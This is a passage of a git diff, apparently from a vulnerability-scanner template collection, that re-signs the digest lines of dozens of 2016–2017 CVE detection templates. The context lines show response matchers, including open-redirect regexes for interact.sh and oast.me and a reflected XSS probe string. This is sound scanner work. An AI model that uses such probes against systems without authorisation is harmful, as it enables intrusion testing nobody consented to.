b/http/cves/2016/CVE-2016-8527.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e0553f487ee2d58071813a5309f9348e9ca2cdaac784386a59e8c2d365bd1b7b022100de464f52b41938c66aeb7e2a014a9e466ad67eab9b926ec68cf7196538177e40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e9346e18bfb4c4d6a1081d41f4cd34352fa4d926162744dcc66b0333f6cb0b7f022100a130940d70233629a33858b36b594b16b3fac8249e1612e0dbee3f832cce06f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-0929.yaml b/http/cves/2017/CVE-2017-0929.yaml index b0e95f4acb..26fee7b905 100644 --- a/http/cves/2017/CVE-2017-0929.yaml +++ b/http/cves/2017/CVE-2017-0929.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 500 -# digest: 4a0a00473045022100a4588a8ca315453fd4058b17fc6b55294a5808948ad8e2a8ca6bc69acb3a6908022012c6ab4acc691ef16efbdbde3fab9cb0c476ae2aced25ad2a4669b8f2c7f2556:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100befaa1c664964744dd1d8c6722277a114b6f2fa28380c244ba22f633b8e4853f022100b73c8d2c36b64be027b558818fd39677eca39927dc0b235c7aa625e51ff7af1d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-1000028.yaml b/http/cves/2017/CVE-2017-1000028.yaml index 8431418b88..c65c4c1cff 100644 --- a/http/cves/2017/CVE-2017-1000028.yaml +++ b/http/cves/2017/CVE-2017-1000028.yaml @@ -51,4 +51,4 @@ http: - "contains(body, 'extensions')" - "status_code == 200" condition: and -# digest: 4a0a004730450220197143a221aff60682e5920e186b66ea318c0512f0d5433a907b9ece724df88b022100beab5d9053b43e2cac58d92a26aa2bdfec85b9cee740d246284232c2ba59e90e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022043d669b8b16a7809a014436363971008a066d6a54fbf8c71dbf3c34fca79a32f022044e14f43dee98fa0e180c5fe9276af9dca155fc864c7276e775e79ec1ac7eefa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-1000029.yaml b/http/cves/2017/CVE-2017-1000029.yaml index f3d13672d8..aa79fb0c3b 100644 --- a/http/cves/2017/CVE-2017-1000029.yaml +++ b/http/cves/2017/CVE-2017-1000029.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202b1ecb4a01d3db488f18d88e30890c01ab67d73172dcd959724ffd53e260af84022100d6f4a9096dc94f23108e95c441641bdee5d1b3a9ca2b8fd037cca63a94e1a6dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201d60e48b7384c0d1a88028a170cb3cfc91c63564ea817b87f9aa16c2e22f6277022100bd3d6df440665b69e2ed8f8e6bb14d03cea04068bdad5c4a9d18fbda46d3fe4d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-10075.yaml b/http/cves/2017/CVE-2017-10075.yaml index 01a9c8319c..9d65bed09f 100644 --- a/http/cves/2017/CVE-2017-10075.yaml +++ b/http/cves/2017/CVE-2017-10075.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022010819a8a794f7913d5769d0d2a2fb4cb18e8bfc192f008923949764b6ee09b0902202313e8489672702f7e45dda26b24f2fc2e13a050288074feb90d080e5f3965af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220136c0d583ed2e4adb2dd235c30da23fd33f94e875621e8280c11bd82d39cd70502201c341e9c1a91f9cfbb120bf3f1a7a78b252f9a411ca56d43d46ae1a82a471290:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-10271.yaml b/http/cves/2017/CVE-2017-10271.yaml index 3cec81e3c6..fcbaed68bb 100644 --- a/http/cves/2017/CVE-2017-10271.yaml +++ b/http/cves/2017/CVE-2017-10271.yaml @@ -110,4 +110,4 @@ http: - body == "{{randstr}}" - status_code == 200 condition: and -# digest: 4b0a00483046022100cc1685ff29667003d078f1649e722afd7019dd57bfcb94fd210d4624aebdf5fd022100adcdc269c9a84770a1817b96f2a5513541930282e2cdb048fdf74c9e31f8e4d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206cd33e205787396c506930ef99f891dab85057ff329031f7f3fafb03a177a46b02201d620b81bc277a73773aff87d2ecf134cde30d6de18c3e92c63af21ce47f0407:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-11165.yaml b/http/cves/2017/CVE-2017-11165.yaml index 47cd2c3ca3..edf26c1b1b 100644 --- a/http/cves/2017/CVE-2017-11165.yaml +++ b/http/cves/2017/CVE-2017-11165.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022006d394921b0d5a7e04a3fd4c15837d306fae435cd168294f0200ce3c8b85c3de022100a28cc857dd6bb3e3b7914deddd731f3d7a9a721dd521879f221cff5c81597e3f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022008a11ab9e93218a47e8c16b1c9fb7c47dc5316032ba4ef91e67ffa755d13d10c0220410b5f535e0ff53ec6b40a7946b186706170f2fe33bec547ebe0d73e36ce2491:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-11444.yaml b/http/cves/2017/CVE-2017-11444.yaml index 60d4828293..650fe12483 100644 --- a/http/cves/2017/CVE-2017-11444.yaml +++ b/http/cves/2017/CVE-2017-11444.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022054097ca889716ee0d3ffd26eccb31e1090cc41ee675729b96e5ec67138f7634c022043939c20b2460e4071b9a01a8d590cef58a83e2c49c0f73b1f517d3434666c0f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b2343cc25b19e1ca3bd71b44003198237cb5901c4d7ebc10cf40e0e9b49fd6bf02203ea67091fb55c946949988fcfc0c892ed7166c3f42c21f180e21804e89046e75:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-11512.yaml b/http/cves/2017/CVE-2017-11512.yaml index ae2c4977b6..d950a4c815 100644 --- a/http/cves/2017/CVE-2017-11512.yaml +++ b/http/cves/2017/CVE-2017-11512.yaml @@ -49,4 +49,4 @@ http: - "fonts" - "extensions" condition: and -# digest: 4a0a00473045022075475b13b0c988c21ece3fd5009fa0ed01ba7fef5c7daffb6579403d0bfdc831022100809a276461fd74d794533eaf19a7d5155c61d32b746d12ac53a958ef2f4dbaf6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c8643b425b2225117d524d7be9264b46eccff5a7a4daa81dc797d4d99d1d3190022064c2cf6f49d75d08b58057f6ee081777406f5020ed4851f896861f25d9b23f4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-11610.yaml b/http/cves/2017/CVE-2017-11610.yaml index 0fc1dd91b5..a426bd4003 100644 --- a/http/cves/2017/CVE-2017-11610.yaml +++ b/http/cves/2017/CVE-2017-11610.yaml @@ -67,4 +67,4 @@ http: - "<methodResponse>" - "<int>" condition: and -# digest: 490a0046304402201ad8588b21856c3e2e3cd9b2005efb3ab532688a03f56bfe6b6d4700adcfeb24022034a9d062ba9d9e21715b31256d921ca212e61f2266208cc6aac596dd63b3d22f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e8cffc12cec213b44e82f5d0f1309538f5f4bc2ad23587675ff7d09cebd9e62a022100b916e70325f22adc4270f97859f43348cd7b1a973716c95b908ba7ad5960e8b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12138.yaml b/http/cves/2017/CVE-2017-12138.yaml index c1061f11a2..fe3ecd31ed 100644 --- a/http/cves/2017/CVE-2017-12138.yaml +++ b/http/cves/2017/CVE-2017-12138.yaml @@ -46,4 +46,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4a0a0047304502210086fe37ec367180de3965e272e7b960209ab80611b4c55bcd92d3b1cfda6074100220136441eb75bb6eeecb92bf19aa6776daade6154861d0ce3e94bbabdd66679817:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d50b605dc5d7aa83bf305787cb9d0325014343d2d679489b1beb3eb6f3f7ba3d022100d6797bb1079261616de2593b32cc99578347d5cd577e9c0dcf05eab86d23b240:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12149.yaml b/http/cves/2017/CVE-2017-12149.yaml index b9fa62b044..5f22928dd1 100644 --- a/http/cves/2017/CVE-2017-12149.yaml +++ b/http/cves/2017/CVE-2017-12149.yaml @@ -64,4 +64,4 @@ http: status: - 200 - 500 -# digest: 4b0a00483046022100ff07339440ed832558350d4e1909be660a2e00b68ca5777281e9e43e25195d8c022100f8797a6125eb10137f47322fda28c9b9075841e230dd91cacc849802e719af59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204d54cb73bed897ffa2b528315d091376b9a653bfcc5b630be98c4e439fa6bbfc022100898e6d8834740b6c30ccff30123bac61289499278d2d43eebd86790ee9846fe0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12544.yaml b/http/cves/2017/CVE-2017-12544.yaml index 6f54790839..4c3a6444ab 100644 --- a/http/cves/2017/CVE-2017-12544.yaml +++ b/http/cves/2017/CVE-2017-12544.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d6096a44064ff11a98cb2a3b0e4ea152b4e05f54485d6eb402c890697a0d3a7902205eda1523b2432502e783dad4db1ca29da4c467564da34d58541f827c4653f9ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c664906de3dbfed265f2b22def98c3be8115a90a6329d475abc146aed54b40590220232f4a4d20c1a0eabfee1bb1cf5bd6b769acee1a64e4ad2df72e4d026bb578ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12583.yaml b/http/cves/2017/CVE-2017-12583.yaml index b45f61def0..037219d39d 100644 --- a/http/cves/2017/CVE-2017-12583.yaml +++ b/http/cves/2017/CVE-2017-12583.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022040428c7102aee34ec9392abb1a5987369b001372f29a97e6592a24621b4deee302206d6c2d35e3f7dcf178bac29764bc37dc1b7b92218a5ca66ca4c21d133e32a5a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100828e4fcd424bd9ace343e46f8638dfd3c98669346297095a539c3a73737b30cc02200f2fd1fa4b5766d172ba09008728788b5b375c4373d3f8166751554ccbaad40c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12611.yaml b/http/cves/2017/CVE-2017-12611.yaml index ffac334e3b..79c0e76f41 100644 --- a/http/cves/2017/CVE-2017-12611.yaml +++ b/http/cves/2017/CVE-2017-12611.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205a7e846889ca9fef021f58b756f7db9e533f0fd2b079699079c49a442f3a817302200cac7efeb08c7927aba913cf747c76517a5bc78708c560f54c0cc97f9bad6598:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c9aea2d3b863eb9e683ecc823a4f5e3e8136f7b965fb0c3655538bdf440bcf3d02207491b538b2e590ae2204dc89543ee472e37827f2ef6fe8be39b73d8d715eff34:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12615.yaml b/http/cves/2017/CVE-2017-12615.yaml index cf158721ed..99dbd027d6 100644 --- a/http/cves/2017/CVE-2017-12615.yaml +++ b/http/cves/2017/CVE-2017-12615.yaml @@ -71,4 +71,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220379d0c5f5c4e19ce0caab699ea5aa078fc15bd35974269774e64b108806b79be0220532d269649aaacb9e369acb9a5d57da778c6df5d4a0afa2976c71e42e63a865c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022052d27ec94a5bec175557a6fa3ad9b58f2103d21b5701bffe972374a2a558f4ef0221008fea90ecc31126ba54f54ceb9000e1e65a774c4fb14d9d59205a1e3034977658:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12617.yaml b/http/cves/2017/CVE-2017-12617.yaml index 86993059e5..fc1bc7621a 100644 --- a/http/cves/2017/CVE-2017-12617.yaml +++ b/http/cves/2017/CVE-2017-12617.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206cb00e6b5ee9e566dec0f1232554eaeda4e733f1c1dd46e3373f782288e400b0022062b74144462bbf9d3db2d69023b0aeacde9792aed39f01c1f567d838f5ff8a8e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cc85f49c32a20468afb964c828ef9f1807574d73dfa35714c5dccfd65af2968002210086f149634411289cfa9719c91807a76b9ee9cac520f34c029197b4e250aa1f61:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12629.yaml b/http/cves/2017/CVE-2017-12629.yaml index 535be66581..f1a7dc0fed 100644 --- a/http/cves/2017/CVE-2017-12629.yaml +++ b/http/cves/2017/CVE-2017-12629.yaml @@ -54,4 +54,4 @@ http: regex: - '"name"\:"(.*?)"' internal: true -# digest: 4b0a00483046022100d4ea117d6f8a9a0bca004f0dd6abfb5a07ccac04c694a225786fb4891966d967022100e00d1081ae2657e9248dc91e946a1ff3d4745375c562b0273a375d31b5fe26c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204330e587ad6ed4278528de81d1036e457ce5f98dcbea54a5a68c136afad1a517022100bf95a11942363e362e6d5c911e5424746f92f4b7389d1dfa3dae055421ae4761:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12635.yaml b/http/cves/2017/CVE-2017-12635.yaml index 53f14a8754..731c1e9791 100644 --- a/http/cves/2017/CVE-2017-12635.yaml +++ b/http/cves/2017/CVE-2017-12635.yaml @@ -64,4 +64,4 @@ http: status: - 201 - 409 -# digest: 4a0a0047304502203addb2b6e215dbff5fb9d55765b537597f5a37384aa1a41b3cdc23deecc6650a022100a8103420fbf062ce4677bc443e076baa92d8b4301fda6d2729268d370c359b60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bc6b8be9a2ae1adc600c103d9514a8a50b5ac05c0df9a3fff1d28ca643eea796022100cb77ea8c8138c7732c50f2462c4e131464f690c8b863c34b390b36042313667b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12637.yaml b/http/cves/2017/CVE-2017-12637.yaml index d037475149..52bed4ee3f 100644 --- a/http/cves/2017/CVE-2017-12637.yaml +++ b/http/cves/2017/CVE-2017-12637.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204718a1f0fc5fb3d6d079a6f410f3203c6081f696613bfb4167a3aedfc56fb25f0221008e2ab021c906aea464f0dacae54694f30f2fa359573d32c35a6dda81f4e2204d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201eb1ef093708f91644f0c82c0d9c6777d4c6c74bac87d6825dbfae9b9c1c3e0c022100a426d0ad10d5f240c23ef2366faa7bac5d05066a4bd437841b5b5117c7133f78:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12794.yaml b/http/cves/2017/CVE-2017-12794.yaml index 6ab7cbf571..e601acc5ff 100644 --- a/http/cves/2017/CVE-2017-12794.yaml +++ b/http/cves/2017/CVE-2017-12794.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022045d37d6d95dbcf0d99b3dd98b0548af3f80775282906963e91de53ddd88178e102207fef1b1e81deb1e461760619d1398e0d670d6ad1cb6109983598f16783a68676:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100efedfed019372fabd4ec462ca8128065b5c74513db3e9e565a9f74f45b7714c802206c5fe554f4a89a675c078661b0ad020fd9ccad466d1ecd821a5632bbc74749ba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-14135.yaml b/http/cves/2017/CVE-2017-14135.yaml index f4e2e467ab..7034429878 100644 --- a/http/cves/2017/CVE-2017-14135.yaml +++ b/http/cves/2017/CVE-2017-14135.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220698aef45fb765d687383961414979c5887eddf98121aa39048ba6f22392d374802202c71c44bdf2e149840f9cef78912bb4112076d87527c5b8a8744946b59339791:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a852b1b32792544b5b6f8d6a8e27f16fa2a21752d6257b99b98f4f76d92371c5022100ab03304decd9205f9b33ce74fd73fc0d5bf2996b53a7ad8af64aa0f5d8cca2f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-14186.yaml b/http/cves/2017/CVE-2017-14186.yaml index a3263f8883..f49b0dfc9b 100644 --- a/http/cves/2017/CVE-2017-14186.yaml +++ b/http/cves/2017/CVE-2017-14186.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207fbfece700e8438f7ceb29e6cb4c1c3db50af2a9118f2a83bd83f1038f9e82d6022100a1093d8d2a97f1f72a728b30504eb3343bb6c5154e62389cc9ab4c4b6c8d3bf6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204bc3674dee1eb49c44df21ca6983aefdd561fa760cf2dc5b0511f8a420c15d9d022100be38b58aec0bb2d0baa6e086131178429de65c611eaed9a9e3a705252ed355aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-14524.yaml b/http/cves/2017/CVE-2017-14524.yaml index e4e58c7c93..aab178fe4e 100644 --- a/http/cves/2017/CVE-2017-14524.yaml +++ b/http/cves/2017/CVE-2017-14524.yaml @@ -40,4 +40,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?oast\.me(?:\s*?)$' -# digest: 4b0a00483046022100b32892e1ac671729ba982d52eb2d13b0e91ddae6c90c6b945a64e664d066cdb9022100eb9538968f1f58b108976f27fc2fa9ed8990673db1a2e1e1611c8fa3cfb12b8a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207d0c495d738c812d3814d912d4d9a15c2068f31549dd5a6094fc26ff7e3fea5f022100bd6cecc315841b445bfd54e0577138bc398e39992b4fd808404389443dc7984c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-14535.yaml b/http/cves/2017/CVE-2017-14535.yaml index 807a3466db..f73440c041 100644 --- a/http/cves/2017/CVE-2017-14535.yaml +++ b/http/cves/2017/CVE-2017-14535.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022004c2c0b0bfc6a4b5299eb051ed30519d948e89244430b213fad2de42968d5d0602207a33257c46086bb05aa71c1e223813644d52d434ee6d268a0c78b20851101d53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220212a0e411a7dfdddc9cefecce4b3e6da4e1d9ab9798165a2e1bdeb040a9f841a022100a563dc32c6b5450a3e77b949621ad22bde185127feaa4fe3221a49c5f800c6a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-14622.yaml b/http/cves/2017/CVE-2017-14622.yaml index 93c4d4edee..be742d8764 100644 --- a/http/cves/2017/CVE-2017-14622.yaml +++ b/http/cves/2017/CVE-2017-14622.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "<script>alert(document.domain)</script>")' - 'contains(body_2, "2kb-amazon-affiliates-store")' condition: and -# digest: 4b0a00483046022100df3637896184e2aa1264d2f8525ee71b55512c568590dccf0a39b3fac376f08002210095e59997264b698ff5ffe471f30c28dd486358c7dcbf06fb0bf4b2265c129718:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022068ae0e1c39c551c92415126fbe3278656ee8caa5459408d8cfb363321b1cfbe302203012f89152ceecc895732bca30da0ba6495ef79ff4f0a96af28e2a8a71e423b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-14651.yaml b/http/cves/2017/CVE-2017-14651.yaml index 2e53ed8d0e..aaa705abb8 100644 --- a/http/cves/2017/CVE-2017-14651.yaml +++ b/http/cves/2017/CVE-2017-14651.yaml @@ -50,4 +50,4 @@ http: part: header words: - "text/html" -# digest: 4a0a00473045022034f84ef006638a070852b350742ad77cd35f09148d0fbf4414429225a72f02e1022100c0814184d527fbae67d23da2ebd61e4645fa2c28e29bff5142f47a551b927bcf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203a8055a3c4f6a207fcbcbc251ad23ae0ca38a2c9274678e60f4d7f6794372f2b02203f743b45bed131ec4e534021b68216b4b0c4b0f37fd85ee60a3bb6258e21fbd5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-14849.yaml b/http/cves/2017/CVE-2017-14849.yaml index 6684332084..5ba1da6df7 100644 --- a/http/cves/2017/CVE-2017-14849.yaml +++ b/http/cves/2017/CVE-2017-14849.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210091a03fe8bc062a8f4ab9b7ce6642025c5599951a009a17ed9ef4ffe4e24c7ccd0220570d8f49b671763897be8c2893f0da5b7e725eaa8a75b1d33581fc1327547dff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cc70e1874f9cb05ffce4e903656bec52da2f4c00911ce81bf12be3d78825a7740221008cc52739137460a82d8edee7d9310d0397e83e70cc1bd5c4934b0a662204180d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-15715.yaml b/http/cves/2017/CVE-2017-15715.yaml index 7d33bbe2f5..d40588030d 100644 --- a/http/cves/2017/CVE-2017-15715.yaml +++ b/http/cves/2017/CVE-2017-15715.yaml @@ -57,4 +57,4 @@ http: - type: dsl dsl: - 'contains(body_2, "{{randstr_1}}")' -# digest: 4b0a00483046022100ae5641ddd92e3d444dbbb35c3b15e833ad880957167aa6fad3e696b3f05e57d6022100a1460cf01679d7a517dba54d83abe3fa648044075c4c3c88058ee7687bb5a231:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e5b95914f4e3f82442439819350bfd0593af2bcbe7c4d94b1f3675ef1b8e5f7e0221008e6d536d529afde82250bb64cee8c324357d63dd2d4b090af6bdac0951e85760:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-15944.yaml b/http/cves/2017/CVE-2017-15944.yaml index c29e2c2cc8..6353771b11 100644 --- a/http/cves/2017/CVE-2017-15944.yaml +++ b/http/cves/2017/CVE-2017-15944.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e0ebb82c78017bace95bb6bdbbd956c0ceefa723b30e23eaf66e133c3671020b02201e43c7c0e0a433896c4df5cfcc72d35bc21c5ead69bbb1c20e4903dc8d6705a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207b6986aaa6889e0462da1d7774c50f898c54663ba26b806cbbb8d02f7f8620f2022000dcf8a3535abbb6d12f598df23e35247ff5fcfca180b1025dd7bc918e855643:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-16806.yaml b/http/cves/2017/CVE-2017-16806.yaml index ab3f62c861..00fbc8046d 100644 --- a/http/cves/2017/CVE-2017-16806.yaml +++ b/http/cves/2017/CVE-2017-16806.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200ba4a0e6757347a8f45e93acf626f6b963960f94fc7cb1934493fe84196f558602205b4f7a68184fc2f970c513193e6955898cadf0658f112d2d32e77c5af8eeb3ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220248d3a025910d7531fbfc6d9b3fa5dc68f2b52eb6ee83db505034ca0c5eaf5b6022073f53caec34066a4d897600b5ab38dd8983378f8db55127c30cc96bc041d373e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-16877.yaml b/http/cves/2017/CVE-2017-16877.yaml index 6454c291c4..18eff63188 100644 --- a/http/cves/2017/CVE-2017-16877.yaml +++ b/http/cves/2017/CVE-2017-16877.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c250b9c908590d5296d8fd48225795617103cff1b0a0082f49eccc4317ef7c2e022100f718c49e8cd4c13a059b632b35040a5391bb6a6714822a1348371aa8b2d51137:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d9730b947db3bb1357d5caa71c56f2d389c56fa519be8a994ae6d432533f49be022002444ed6379e5c2600c10f50fb2580bd67bf226204375dac092d07dbbca2d1f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-17043.yaml b/http/cves/2017/CVE-2017-17043.yaml index 8be78e7854..1bad04ee13 100644 --- a/http/cves/2017/CVE-2017-17043.yaml +++ b/http/cves/2017/CVE-2017-17043.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203013773f07b32293d187ef5593c809c0d5b199d0535add43a30b9558d54ad34b0220793cad7ec1c8c9661bbcec6319fcac9cd92006ed78d1f46ccc76dca5de51cb18:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022031c15c11202c7964366d60e629a94726935eb45208e9d1342418855dd021e4fc022100a7b7f0a3a0ab2dbcad54dc28a88cbfbb1b98b72d7b8dcfd03519b8a935dd99de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-17059.yaml b/http/cves/2017/CVE-2017-17059.yaml index 3a686685aa..81239b67f7 100644 --- a/http/cves/2017/CVE-2017-17059.yaml +++ b/http/cves/2017/CVE-2017-17059.yaml @@ -66,4 +66,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022074f0b24a9cb480e81960e319cc7ee19b77dec9226fe67fb84ef549e875531ccb022100d2da121efbde5f1678796a09a5a402923ee1a4b01df208e0d978251d20b71f1b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f214539df64786c3d52922e14c4c9d2e8766c6bed71928bb04a9c9dc07fb4e53022100e31456e1f51b587f652c6f75dd3239fd76a2a90af5b0c6fa4b9ed64469bbc8a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-17451.yaml b/http/cves/2017/CVE-2017-17451.yaml index be3d789c42..e4bd532644 100644 --- a/http/cves/2017/CVE-2017-17451.yaml +++ b/http/cves/2017/CVE-2017-17451.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ec046f9a81c101fb374ae81bf7e992adeec3cc8e98a3583295368cde81c2129e022100a1232b8f02f87a0a260815390cb7e841d202487f1b339d81ed1212cc8af179de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a0ddbaf09b68c68b39dfffbe86e40890a1e47752592d33d12f9defe516d7f841022100962efc1e1ab9bd391c8f3f57a1671572a0750fefa25c9c3a2e86d2c923275973:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-17562.yaml b/http/cves/2017/CVE-2017-17562.yaml index 46a33424f9..364410874d 100644 --- a/http/cves/2017/CVE-2017-17562.yaml +++ b/http/cves/2017/CVE-2017-17562.yaml @@ -118,4 +118,4 @@ http: - type: status status: - 200 -# digest: 480a004530430220137571f29820e7cfeff24983e553083fbd48df32ed6c9f6be7ab7a0b2ab3dcec021f1cf2aba6f6d18369d6d6d6784a620d36863b9446b26c941818edd6a6a12322:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a0718d9f04bc6d15d22ac54b93c6f567b67f15d01f50cee17d7f3571416b85140220106a40ed475fcb76830332c3c1044593fc378ecc06198d8f747cee8305851a5b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-17736.yaml b/http/cves/2017/CVE-2017-17736.yaml index 7d98aa51e1..7ee2be835e 100644 --- a/http/cves/2017/CVE-2017-17736.yaml +++ b/http/cves/2017/CVE-2017-17736.yaml @@ -53,4 +53,4 @@ http: - "Database Setup" - "SQLServer" condition: and -# digest: 